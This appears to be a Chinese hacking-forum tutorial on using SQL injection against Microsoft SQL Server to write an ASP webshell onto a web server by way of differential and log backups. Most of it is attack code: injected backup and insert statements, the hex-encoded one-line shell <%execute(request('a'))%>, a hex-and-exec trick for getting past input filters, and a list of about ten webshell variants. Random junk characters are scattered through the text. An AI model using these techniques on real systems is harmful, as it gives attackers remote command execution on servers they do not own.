MSsql差异备份总结

admin

差异备份的流程大概这样：
5 g, r5 `0 K: z+ K: ?- \6 q1.完整备份一次(保存位置当然可以改)
backup database 库名 to disk = 'c:\ddd.bak';--
; P3 x" H4 a( f0 j9 N' v
2.创建表并插曲入数据
3 a! F0 L5 n  r; B6 L  Kcreate table [dbo].[dtest] ([cmd] [image]);
7 W9 \' s: ^. hinsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--

9 S* N1 ?0 Y" v  g% O3.进行差异备份
9 w. \' k) T6 z% U0 Q5 b9 ^5 T8 dbackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
" j2 ~/ Z, V$ H! }9 l
上面
0x3C25657865637574652872657175657374282261222929253E
就是一句话木马的内容：<%execute(request("a"))%>

如下是网上常见的差异备份代码，思路一样！
& ~. H6 H/ w( }! L. e$ A5 \: n===================================================
( V6 I* Z$ r: e* C/ f; `利用差异备份提高提高backupwebshell的成功率,减少文件大小
' B2 |* L3 |1 a  Z3 ~# B步骤:

, g6 {3 B# w* Q$ ?$ P# kdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库
7 j/ I5 ]$ x1 k* ^7 k" Z# `
create table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表
2 S& ~& j5 b  m& _) O2 Y  s, ?
5 n% R# v# t+ y5 E8 r
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中
0 L1 n: `) Z- m0 G) `6 j
+ w$ V0 B* M( G" K; |declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份

% ?4 W3 a- w5 n9 V" F: F& Z, r; ldrop table [xiaolu]  -- 删除此表。
0 n* c# z& `0 Q  a5 }6 H
0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
4 n5 T& M" _) I8 K0 b2 U0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp

; I4 D5 L+ x/ C: ?1 Z声明：方法不是我想的，我只是写工具，默认得到shell是
<%execute(request("a"))%>
===============================================================
" z" R7 F, f4 @
  U& ^/ E2 g. `/ A: C我发现上面代码，有时会无效，而直接用

) n' l- Q3 V% z7 q$ ]; z- T6 R0 ^, g0 Rbackup database 库名 to disk = 'c:\ddd.bak'
3 i  }- e3 |6 h% Q1 v
create table [dbo].[dtest] ([cmd] [image]);
9 n* ?; h# \! M3 x: L0 U
; t* w; L8 p+ w4 jinsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！

" H$ f# s  n5 }" p1 @1 Z5 ~$ M8 p库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！
1 S8 M( X+ P/ c& j8 S$ t
网上还有log增量备份的，我也把他记录一下
=====================================================
8 ^" ~0 m' d! k8 Z! ^6 A& F9 l另一种log增量备份技术:

';alter database null set RECOVERY FULL--

';create table cmd (a image)--

9 I4 S% L8 Z% l0 t3 W# V5 o5 i';backup log null to disk = 'f:\cmd' with init--

0 \4 i2 U9 m2 D1 G+ ^. `- Q* {';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
2 b7 a  _1 X& z6 a
2 `- C# c! h9 r9 x7 @4 |: a';backup log null to disk = '备份路径'--

';drop table cmd--
6 Q9 J" q/ z7 `8 W3 Z
';alter database XXX set RECOVERY SIMPLE--
: h, j  ]0 D( N2 e5 D+ @
" O( X6 s, F# ^1 c( _: y6 GPS:0x3C2565786563757465287265717565737428226122292
9253EDA 是一句话小马16进制转来的
9 t9 V& c# U7 |9 a6 \
6 i  ^: |# W2 D  D. c$ r* @说到一句话马，还可以有这么几种写法：
/ h  [4 Y: |  Z5 _
a)<%%25Execute(request("a"))%%25>
b)<%Execute(request("a"))%>
c)%><%execute request("a")%><%
d)<script language=VBScript runat=server>execute request("a")</script>
e)<%25Execute(request("a"))%25>
f)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
g)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
h)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
, v7 |5 G1 a  TI)<%eval request(0)%>
J)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话

  c1 h. d% ~) F7 C5 }5 V=============================================
  ~- z; d* P0 W  T$ v0 l2 i* ?. r
& [3 R: P( T' y  c0 L当遇到差备过滤了/时用这个语句代替
5 t/ g; e7 `/ m) i+ T2 [& f- p
5 Z' C/ C+ a* X4 b6 vdeclare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--
/ q6 D8 o! T0 C6 f. T/ F
$ p" G6 j. J9 r把要执行的语句转16进制然后用exec执行

* X% H1 h7 Y4 c
减少备份文件大小方法如下:
6 t1 i  W. F# v9 `
7 _9 f8 v* r; f2 B) M/ J$ [总的来说就是那么简单几句,下面以备份数据库model为例子
1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
2
7 d$ E( C, Y8 Tid=1;backup database model to disk='你的路径‘ with differential,format;--

! f5 f# G( Z/ p+ Z0 _$ A: G

SQL语句清理日志
$ {0 ~- W$ E/ ^+ M: v" M注：test为数据库名
+ b2 k; R9 K+ g# ^/ P
( E3 Z& D' R) \% A* `7 Q' J# w7 a& i--清空日志
DUMP TRANSACTION test WITH NO_LOG

--截断事务日志
BACKUP LOG test WITH NO_LOG

--收缩数据库
3 b. N, ~, G2 t- m! T0 ?DBCC SHRINKDATABASE(test)

--收缩指定数据文件,1是文件号,可以通过这个语句查询到
: _- ]& J. _! J! O5 ASelect * from sysfiles DBCC SHRINKFILE(1)

5 X2 E( O( ~3 {& k& W+ e, A--以后能自动收缩
EXEC sp_dboption 'test', 'autoshrink', 'TRUE'